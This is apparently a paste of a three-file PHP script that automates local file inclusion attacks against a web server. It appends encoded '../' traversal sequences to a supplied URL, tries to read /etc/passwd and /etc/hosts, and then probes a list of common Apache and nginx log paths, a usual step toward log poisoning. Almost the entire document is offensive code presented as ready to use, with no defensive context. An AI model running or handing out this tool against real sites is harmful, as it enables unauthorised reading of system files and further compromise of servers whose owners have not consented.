SHOW:
|
|
- or go back to the newest paste.
1 | //Lfi.php - Main file | |
2 | ||
3 | <?php | |
4 | ||
5 | //LFI exploitation script | |
6 | ||
7 | require("funcs.php"); | |
8 | require("dirs.php"); | |
9 | $url = $_GET['u']; | |
10 | ||
11 | define(LIM, 10); //Limit of ../ to check | |
12 | define(RET, "..%2F"); | |
13 | ||
14 | $toInject = $url; | |
15 | ||
16 | ||
17 | ||
18 | //Main loop to append ../ | |
19 | for($c = 1; $c < LIM; $c++){ | |
20 | $toInject = $toInject.RET; //Url with ../ appended | |
21 | ||
22 | $passwdTest = searchPasswd($toInject); //Buscamos passwd | |
23 | $hostsTest = searchHosts($toInject); //Buscamos etc/hosts | |
24 | ||
25 | if($passwdTest || $hostsTest){ | |
26 | echo $passwdTest." ".$hostsTest; | |
27 | testLogs($toInject, $logsDir); | |
28 | die; | |
29 | } | |
30 | ||
31 | } | |
32 | ||
33 | ?> | |
34 | ||
35 | //funs.php - Functions file | |
36 | ||
37 | <?php | |
38 | ||
39 | //This functions returns body of $url | |
40 | function getBody($url){ | |
41 | $ch = curl_init(); | |
42 | curl_setopt($ch, CURLOPT_URL, $url); | |
43 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
44 | curl_setopt($ch, CURLOPT_VERBOSE, 1); | |
45 | curl_setopt($ch, CURLOPT_HEADER, 1); | |
46 | curl_setopt($ch, CURLOPT_USERAGENT, $ua); | |
47 | curl_setopt($ch, CURLOPT_FAILONERROR, True); | |
48 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True); | |
49 | curl_setopt($ch, CURLOPT_AUTOREFERER, True); | |
50 | curl_setopt($ch, CURLOPT_TIMEOUT, 10); | |
51 | curl_setopt($ch, CURLOPT_ENCODING, ''); | |
52 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); | |
53 | ||
54 | $body = curl_exec($ch); | |
55 | ||
56 | return $body; | |
57 | } | |
58 | ||
59 | //This functions returns response size | |
60 | function getResponseSize($url){ | |
61 | $ch = curl_init(); | |
62 | curl_setopt($ch, CURLOPT_URL, $url); | |
63 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
64 | curl_setopt($ch, CURLOPT_VERBOSE, 1); | |
65 | curl_setopt($ch, CURLOPT_HEADER, 1); | |
66 | curl_setopt($ch, CURLOPT_USERAGENT, $ua); | |
67 | curl_setopt($ch, CURLOPT_FAILONERROR, True); | |
68 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True); | |
69 | curl_setopt($ch, CURLOPT_AUTOREFERER, True); | |
70 | curl_setopt($ch, CURLOPT_TIMEOUT, 10); | |
71 | curl_setopt($ch, CURLOPT_ENCODING, ''); | |
72 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); | |
73 | ||
74 | curl_exec($ch); | |
75 | $info = curl_getinfo($ch); | |
76 | ||
77 | return $info['size_download']; | |
78 | } | |
79 | ||
80 | //This functions checks if /etc/passwd is accessible | |
81 | function searchPasswd($url){ | |
82 | $passwd = "etc/passwd"; | |
83 | $nb = "%00"; | |
84 | $toReq = $url.$passwd;//.$nb; | |
85 | $root = "root:x:0:0:root:/root:/bin/bash"; | |
86 | $body = getBody($toReq); | |
87 | //echo $toReq."<br>"; | |
88 | ||
89 | if(strpos($body, $root)) return $toReq;//echo $toReq."<br>"; | |
90 | ||
91 | ||
92 | } | |
93 | ||
94 | //This functions checks if /etc/hosts is accesible | |
95 | function searchHosts($url){ | |
96 | $hosts = "etc/hosts"; | |
97 | $nb = "%00"; | |
98 | $toReq = $url.$hosts;//.$nb; | |
99 | ||
100 | $ip = "127.0.0.1"; | |
101 | $host = "localhost"; | |
102 | $body = getBody($toReq); | |
103 | ||
104 | ||
105 | if(strpos($body, $ip) && strpos($body, $host)) return $toReq;//echo $toReq."<br>"; | |
106 | ||
107 | } | |
108 | ||
109 | function testLogs($url, &$logsDir){ | |
110 | echo "<br>"; | |
111 | foreach ($logsDir as $dir): | |
112 | $currentTest = $url.$dir; //Url with returns with log appended | |
113 | echo getResponseSize($currentTest)."<br>"; | |
114 | endforeach; | |
115 | } | |
116 | ?> | |
117 | ||
118 | //dirs.php - This file contains common Apache directories | |
119 | ||
120 | <?php | |
121 | ||
122 | //This file contains an array with common logs directories | |
123 | $logsDir = array('error.log', | |
124 | 'error_log', | |
125 | 'etc/httpd/conf/logs/error_log', | |
126 | 'etc/httpd/logs/error_log', | |
127 | 'home/php5/logs/error_log', | |
128 | 'log/error.log', | |
129 | 'log/error_log', | |
130 | 'logs/error.log', | |
131 | 'logs/error_log', | |
132 | 'usr/local/apache/error.log', | |
133 | 'usr/local/apache/log/error_log', | |
134 | 'usr/local/apache/logs/error_log', | |
135 | 'usr/local/apache2/log/error_log', | |
136 | 'usr/local/apache2/logs/access_log', | |
137 | 'usr/local/apache2/logs/error.log', | |
138 | 'usr/local/apache2/logs/error_log', | |
139 | 'usr/local/apachessl/logs/error_log', | |
140 | 'usr/local/httpd/log/error_log', | |
141 | 'usr/local/httpd/logs/error_log', | |
142 | 'usr/local/php/log/error_log', | |
143 | 'var/apache2/logs/access_log', | |
144 | 'var/apache2/logs/error_log', | |
145 | 'var/log/apache/error_log', | |
146 | 'var/log/apache2/access.log', | |
147 | 'var/log/apache2/access_log', | |
148 | 'var/log/apache2/error.log', | |
149 | 'var/log/apache2/error_log', | |
150 | 'var/log/httpd-access.log', | |
151 | 'var/log/httpd-error.log', | |
152 | 'var/log/httpd/access_log', | |
153 | 'var/log/httpd/error_log', | |
154 | 'var/log/nginx/error.log', | |
155 | 'var/log/php-fcgi/error_log', | |
156 | 'var/log/php-fpm/err.log', | |
157 | 'var/www/logs/access_log', | |
158 | 'var/www/logs/error_log'); | |
159 | ?> |